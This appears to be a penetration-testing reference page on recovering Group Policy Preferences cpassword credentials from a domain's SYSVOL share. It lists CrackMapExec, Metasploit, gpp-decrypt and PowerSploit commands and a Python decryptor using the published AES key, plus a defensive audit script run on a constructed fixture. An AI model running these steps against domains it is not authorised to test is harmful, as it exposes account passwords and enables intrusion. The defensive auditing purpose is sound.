Overview

Group Policy Preferences (GPP) stored credentials in the cpassword attribute of XML files under SYSVOL. Microsoft published the AES-256 key used to encrypt them, so any domain user who can read SYSVOL can decrypt them.

Find GPP Files

Manual

smbclient //DC_IP/SYSVOL -U 'user%password'
# the find below assumes the SYSVOL share has been mounted at /mnt/sysvol (e.g. mount -t cifs)
find /mnt/sysvol -name "*.xml" -exec grep -l "cpassword" {} \;
Look in:
  • Groups.xml — local user/admin passwords
  • Services.xml — service account passwords
  • ScheduledTasks.xml — scheduled task credentials
  • DataSources.xml — database credentials
  • Drives.xml — mapped drive credentials
  • Printers.xml — printer credentials

CrackMapExec

crackmapexec smb DC_IP -u user -p password -M gpp_password

Metasploit

use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run

Decrypt cpassword

gpp-decrypt

gpp-decrypt "ENCRYPTED_CPASSWORD"

Python

import base64
from Crypto.Cipher import AES          # pip install pycryptodome
from Crypto.Util.Padding import unpad

# AES-256 key Microsoft published in the MS-GPPREF specification; the IV is 16 zero bytes
key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
iv = b'\x00' * 16
cpassword = "CPASSWORD_HERE"
# GPP stores the base64 without '=' padding; restore it or b64decode() raises "Incorrect padding"
cpassword += "=" * (-len(cpassword) % 4)
enc = base64.b64decode(cpassword)
cipher = AES.new(key, AES.MODE_CBC, iv)
# the plaintext is PKCS#7-padded UTF-16-LE
print(unpad(cipher.decrypt(enc), AES.block_size).decode('utf-16-le'))

Get-GPPPassword (PowerSploit)

Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

Notes

  • MS14-025 (May 2014) removed the ability to set new GPP passwords in the policy editor
  • The patch did NOT remove cpassword values that already existed
  • Domains that predate the patch often still have them in SYSVOL
  • Any authenticated domain user can read SYSVOL, so leftover values are readable by everyone
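Because the patch leaves existing cpassword values in place, the practical defender's task is to audit your own SYSVOL for them and rotate the affected accounts. The following script is an added example, not code from the original page: it walks a SYSVOL copy or mount, parses the preference files named above, and reports every element that carries a cpassword attribute, decrypting with the same published key as the snippet above so the finding can be confirmed. The Groups.xml fixture, the account name LocalAdmin, the policy GUID placeholder and the sample password are all constructed for the demo; encrypt_cpassword exists only to build that fixture. It uses PyCryptodome like the page's snippet and falls back to the cryptography package if that is not installed.

```python
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

try:  # PyCryptodome, as used in the decrypt snippet above
    from Crypto.Cipher import AES as _AES

    def _aes_cbc(key, iv):
        c = _AES.new(key, _AES.MODE_CBC, iv)
        return c.encrypt, c.decrypt
except ImportError:  # fall back to the 'cryptography' package
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key, iv):
        e = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
        d = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return (lambda b: e.update(b) + e.finalize()), (lambda b: d.update(b) + d.finalize())

# AES-256 key Microsoft published in the MS-GPPREF specification; the IV is all zeros.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = b"\x00" * 16
# Preference files that can carry a cpassword attribute (compared case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}


def _pkcs7_pad(b: bytes) -> bytes:
    n = 16 - len(b) % 16
    return b + bytes([n]) * n


def _pkcs7_unpad(b: bytes) -> bytes:
    n = b[-1] if b else 0
    if not 1 <= n <= 16 or b[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return b[:-n]


def decrypt_cpassword(cpassword: str) -> str:
    """GPP strips the base64 '=' padding, so restore it before decoding."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    _, dec = _aes_cbc(GPP_KEY, GPP_IV)
    return _pkcs7_unpad(dec(raw)).decode("utf-16-le")


def encrypt_cpassword(password: str) -> str:
    """Inverse of decrypt_cpassword; used here only to build the constructed fixture."""
    enc, _ = _aes_cbc(GPP_KEY, GPP_IV)
    return base64.b64encode(enc(_pkcs7_pad(password.encode("utf-16-le")))).decode().rstrip("=")


def find_cpasswords(xml_data, filename="<memory>") -> list:
    """Return one finding per element that carries a cpassword attribute."""
    findings = []
    try:
        root = ET.fromstring(xml_data)
    except ET.ParseError:
        return findings  # not a well-formed preference file
    for elem in root.iter():
        cp = elem.attrib.get("cpassword")
        if cp is None:
            continue
        try:
            password = decrypt_cpassword(cp) if cp else None
        except (ValueError, UnicodeDecodeError):
            password = None  # attribute present but not a valid cpassword blob
        findings.append({"file": filename, "element": elem.tag,
                         "account": elem.attrib.get("userName") or elem.attrib.get("accountName"),
                         "password": password})
    return findings


def audit_sysvol(sysvol_root: str) -> list:
    """Walk a SYSVOL copy (or mount) and collect cpassword findings from GPP XML files."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
    return findings


# Constructed Groups.xml fixture: hypothetical account name and sample password.
SAMPLE_PASSWORD = "Summer2013!"
SAMPLE_GROUPS_XML = (
    '<Groups>\n'
    '  <User name="LocalAdmin" changed="2013-05-01 10:00:00">\n'
    '    <Properties action="U" cpassword="{cp}" userName="LocalAdmin"/>\n'
    '  </User>\n'
    '</Groups>\n'
).format(cp=encrypt_cpassword(SAMPLE_PASSWORD))


def demo() -> list:
    """Write the fixture into a temporary SYSVOL-style layout and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        pref_dir = os.path.join(tmp, "Policies", "{HYPOTHETICAL-GUID}", "Machine", "Preferences", "Groups")
        os.makedirs(pref_dir)
        with open(os.path.join(pref_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return audit_sysvol(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: <{f['element']}> account={f['account']} password={f['password']}")
```

Point audit_sysvol at a mounted SYSVOL (e.g. /mnt/sysvol) to run it against a real domain; every finding identifies the policy path and account to rotate, and the files can then be cleaned up in the Group Policy Management Console.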

Quick Reference

Task          Command
CME           crackmapexec smb DC -u user -p pass -M gpp_password
Decrypt       gpp-decrypt "cpassword"
Manual        Search SYSVOL for *.xml containing cpassword
PowerSploit   Get-GPPPassword